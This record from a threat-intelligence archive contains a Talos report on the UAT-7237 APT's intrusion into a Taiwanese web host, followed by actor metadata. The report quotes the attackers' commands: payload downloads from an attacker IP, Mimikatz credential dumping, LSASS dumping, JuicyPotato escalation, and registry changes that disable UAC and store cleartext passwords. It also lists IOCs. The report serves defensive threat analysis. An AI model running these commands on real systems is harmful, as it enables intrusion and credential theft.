{ "id": "b8a306ca-d6d3-478c-bc76-cfd547064911", "created_at": "2026-04-06T00:19:45.026766Z", "updated_at": "2026-04-10T03:36:18.958609Z", "deleted_at": null, "sha1_hash": "33763c536d461fc1237fdea8c73051ea7da47e93", "title": "UAT-7237 targets Taiwanese web hosting infrastructure", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 105339, "plain_text": "UAT-7237 targets Taiwanese web hosting infrastructure\r\nBy Asheer Malhotra\r\nPublished: 2025-08-15 · Archived: 2026-04-02 10:36:57 UTC\r\nCisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since\r\nat least 2022, which has significant overlaps with UAT-5918.\r\nUAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies\r\nheavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and\r\nconduct malicious activities within the compromised enterprise.\r\nUAT-7237 aims to establish long-term persistence in high-value victim environments.\r\nTalos also identified a customized Shellcode loader in UAT-7237's arsenal that we track as “SoundBill.”\r\nSoundBill can be used to decode and load any shellcode, including Cobalt Strike.\r\nTalos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on\r\nestablishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of\r\nopen-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as\r\n“SoundBill.”\r\nTalos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of\r\nthreat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918.\r\nAdditionally, both threat groups develop, customize and operate tooling using the Chinese language as their\r\npreliminary language of choice.\r\nWhile Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics,\r\ntechniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:\r\nUAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies\r\nprimarily on Meterpreter based reverse shells.\r\nAfter a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's\r\ndeployment of web shells is highly selective and only on a chosen few compromised endpoints.\r\nWhile UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a\r\ncombination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the\r\nsame.\r\nIn a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese\r\nweb hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim\r\norganization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform\r\nseveral malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke\r\nmalware, setting up backdoored access via VPN clients, network scanning and proliferation.\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 1 of 7\n\nInitial access and reconnaissance\r\nUAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet.\r\nOnce the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts\r\nrapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.\r\nReconnaissance consists of identifying remote hosts, both internal and on the internet:\r\ncmd /c nslookup \u003cvictim’s_domain\u003e\r\ncmd /c systeminfo\r\ncmd /c curl\r\ncmd /c ping 8[.]8[.]8[.]8 \r\ncmd /c ping 141[.]164[.]50[.]141 // Attacker controlled remote server.\r\ncmd /c ping \u003cvictim’s_domain\u003e\r\ncmd /c ipconfig /all\r\nWhile UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237\r\ndeviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later\r\naccess the systems via RDP:\r\ncmd /c c:\\temp\\WM7Lite\\download[.]exe hxxp[://]141[.]164[.]50[.]141/sdksdk608/win-x64[.]rar c:\\temp\\\r\npowershell (new-object System[.]Net[.]WebClient).DownloadFile('hxxp[://]141[.]164[.]50[.]141/sdksdk60\r\nOnce UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to\r\nadditional systems in the enterprise to proliferate and conduct malicious activities:\r\ncmd[.]exe /c cd /d \"\u003cremote_smb_share\u003e\"\u0026net use\r\ncmd[.]exe /c cd /d \"\u003cremote_smb_share\u003e\"\u0026dir \\\\\u003cremote_smb_share\u003e\\c$\\\r\ncmd[.]exe /c cd /d \"C:\\\"\u0026net group \"domain admins\" /domain\r\ncmd[.]exe /c cd /d \"C:\\\"\u0026net group \"domain controllers\" /domain\r\nIn addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows\r\nManagement Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI\r\nand WMICmd:\r\ncmd[.]exe /c cd /d \"C:\\\"\u0026C:\\ProgramData\\dynatrace\\sharpwmi[.]exe \u003cIP\u003e \u003cuser\u003e \u003cpass\u003e cmd whoami\r\ncmd.exe /c cd /d \"C:\\DotNet\\\"\u0026WMIcmd.exe\r\nwmic /node:\u003cIP\u003e /user:Administrator /password:\u003cpass\u003e process call create cmd.exe /c whoami\r\n \r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 2 of 7\n\nwmic /node:\u003cIP\u003e /user:Administrator /password:\u003cpass\u003e process call create cmd.exe /c netstat -ano \u003ec:\\\r\n SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary\r\ncommand and code executions.\r\nUAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:\r\ncmd.exe /c systeminfo\r\ncmd.exe /c tasklist\r\ncmd.exe /c net1 user /domain\r\ncmd.exe /c whoami /priv\r\ncmd.exe /c quser\r\nPost-compromise tooling and actions on objectives\r\nSoundBill\r\nAfter compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of\r\ntasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is\r\nbuilt based on  “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named\r\n“ptiti.txt” and execute the resulting shellcode.\r\nIt is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese\r\ninstant messaging software, and are likely used as decoy files in attacks involving spear phishing.\r\nSoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of\r\nMimikatz:\r\nVTSB.exe privilege::debug sekurlsa::logonpasswords exit\r\nOr it may be a mechanism to execute arbitrary commands on the infected system, such as:\r\nc:\\temp\\vtsb.exe -c whoami\r\nThe shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long\r\nterm access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with\r\nSoundBill communicate over HTTPS with its command and control (C2):\r\ncvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws\r\nJuicyPotato\r\nUAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to\r\nexecute multiple commands on endpoints such as:\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 3 of 7\n\ncmd.exe /c c:\\hotfix\\juicy2.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami\r\nConfiguration changes\r\nDuring intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the\r\nWindows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPoli\r\nThey also attempted to enable storage of cleartext passwords:\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_\r\nUAT-7237 also accessed the Component Services management console, likely to adjust privileges for their\r\nmalicious components:\r\nmmc comexp.msc\r\nUAT-7237's pursuit of credentials\r\nUAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints.\r\nHowever, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by\r\nusing a Mimikatz instance built into SoundBill to extract credentials:\r\nFilename/command Tooling name\r\nabc.dll Comsvcs.dll for LSASS process dumping\r\nFileless.exe Mimikatz\r\nVTSB.exe privilege::debug sekurlsa::logonpasswords exit SoundBill with the Mimikatz payload\r\nFurthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the\r\nregistry and disk:\r\nreg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"\r\ndir c:\\*vnc.ini /s /b\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 4 of 7\n\nAnother (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file\r\nand another executable — again for credential extraction:\r\ncmd.exe /c C:\\hotfix\\invoketest.exe -cmd \"cmd /c C:\\hotfix\\1.bat\"\r\ncmd.exe /c C:\\hotfix\\invoketest.exe -cmd \"cmd /c C:\\hotfix\\Project1.exe C:\\hotfix\\SSP.dll\"\r\n“Project1[.]exe” above is the ssp_dump_lsass project on GitHub. It takes a DLL file as an argument, injects it into\r\nthe Local Security Authority Service (LSASS)  process, which then dumps the LSASS process into a BIN file.\r\nOptionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:\r\ncmd.exe /c c:\\hotfix\\juicy2.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} -p \"c:\\windows\\system\r\nThe process dump obtained is then staged into an archive for exfiltration:\r\ncmd.exe /c \"c:\\program files\\7-Zip\\7z.exe\" a C:\\hotfix\\1.zip C:\\hotfix\\1.bin\r\nProliferating through the enterprise\r\nUAT-7237 uses the following network scanning tooling:\r\nFScan: A network scanner tool used to scan for open ports against IP subnets:\r\nfileless -h 10.30.111.1/24 -nopoc -t 20\r\nSMB scans: To identify SMB services information on specific endpoints:\r\nsmb_version 10.30.111.11 445\r\nAs soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using\r\ncredentials they’ve extracted previously:\r\ncmd[.]exe /c netstat -ano |findstr 3389\r\ncmd[.]exe /c nslookup \u003cvictim’s_subdomains\u003e\r\ncmd[.]exe /c net use \u003cIP\u003e\\ipc$ \u003cpass\u003e /user:\u003cuserid\u003e\r\ncmd[.]exe /c dir \\\\\u003cremote_system\u003e\\c$\r\ncmd[.]exe /c net use \\\\\u003cremote_system\u003e\\ipc$ /del\r\nSoftEther VPN\r\nThe remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client\r\nexecutable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 5 of 7\n\nserver binary.\r\nTalos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:\r\nThe server was created in September 2022 and was last used in December 2024, indicating that UAT-7237\r\nmay have been using SoftEther over a two-year period.\r\nUAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language\r\nconfiguration file, indicating that the operators were proficient with the language.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. \r\nSecure Access provides seamless transparent and secure access to the internet, cloud services or private\r\napplication no matter where your users work.  Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access.\r\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 6 of 7\n\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nThe following Snort rules cover this threat:\r\nSnort v2 : 64908 - 64916\r\nSnort v3: 301209 - 301212\r\nIOCs\r\n IOCs for this research can also be found at our GitHub repository here. \r\n450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\\temp\\wmiscan.exe\r\n6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp_dump_\r\nE106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan\r\nB52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb_version.exe\r\n864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz\r\nSoundBill\r\nDf8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386\r\nCobalt Strike\r\n0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7\r\n7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f\r\ncvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws\r\nhttp[://]141[.]164[.]50[.]141/sdksdk608/win-x64[.]rar\r\n141[.]164[.]50[.]141\r\nSource: https://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nhttps://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/uat-7237-targets-web-hosting-infra/" ], "report_names": [ "uat-7237-targets-web-hosting-infra" ], "threat_actors": [ { "id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7", "created_at": "2023-06-23T02:04:34.793629Z", "updated_at": "2026-04-10T02:00:04.971054Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Bronze Silhouette", "Dev-0391", "Insidious Taurus", "Redfly", "Storm-0391", "UAT-5918", "UAT-7237", "UNC3236", "VOLTZITE", "Vanguard Panda" ], "source_name": "ETDA:Volt Typhoon", "tools": [ "FRP", "Fast Reverse Proxy", "Impacket", "LOLBAS", "LOLBins", "Living off the Land" ], "source_id": "ETDA", "reports": null }, { "id": "09031838-56db-4676-a2b2-4bc50d8b7b0b", "created_at": "2024-01-23T13:22:35.078612Z", "updated_at": "2026-04-10T02:00:03.519282Z", "deleted_at": null, "main_name": "Flax Typhoon", "aliases": [ "Ethereal Panda", "Storm-0919" ], "source_name": "MISPGALAXY:Flax Typhoon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "86c7abc2-1b71-4665-b9e3-1594d6d15a4a", "created_at": "2023-09-07T02:02:47.367254Z", "updated_at": "2026-04-10T02:00:04.698935Z", "deleted_at": null, "main_name": "Flax Typhoon", "aliases": [ "Ethereal Panda", "RedJuliett" ], "source_name": "ETDA:Flax Typhoon", "tools": [ "BadPotato", "CHINACHOPPER", "China Chopper", "JuicyPotato", "LOLBAS", "LOLBins", "Living off the Land", "Metasploit", "Mimikatz", "SinoChopper", "SoftEther VPN" ], "source_id": "ETDA", "reports": null }, { "id": "7074cc97-be8f-417b-8294-124c3add8668", "created_at": "2025-05-29T02:00:03.190761Z", "updated_at": "2026-04-10T02:00:03.84828Z", "deleted_at": null, "main_name": "UAT-5918", "aliases": [], "source_name": "MISPGALAXY:UAT-5918", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea4726a4-3b7c-45db-a579-2abd4986941c", "created_at": "2025-11-01T02:04:53.002048Z", "updated_at": "2026-04-10T02:00:03.764362Z", "deleted_at": null, "main_name": "BRONZE FLAXEN", "aliases": [ "Ethereal Panda ", "Flax Typhoon " ], "source_name": "Secureworks:BRONZE FLAXEN", "tools": [ "Bad Potato", "Juicy Potato", "Metasploit", "Mimikatz", "SoftEther VPN" ], "source_id": "Secureworks", "reports": null }, { "id": "ba78141a-9e8e-4662-91b1-e09dbb802e29", "created_at": "2026-02-03T02:00:03.439277Z", "updated_at": "2026-04-10T02:00:03.939587Z", "deleted_at": null, "main_name": "UAT-7237", "aliases": [], "source_name": "MISPGALAXY:UAT-7237", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434785, "ts_updated_at": 1775792178, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/33763c536d461fc1237fdea8c73051ea7da47e93.pdf", "text": "https://archive.orkl.eu/33763c536d461fc1237fdea8c73051ea7da47e93.txt", "img": "https://archive.orkl.eu/33763c536d461fc1237fdea8c73051ea7da47e93.jpg" } }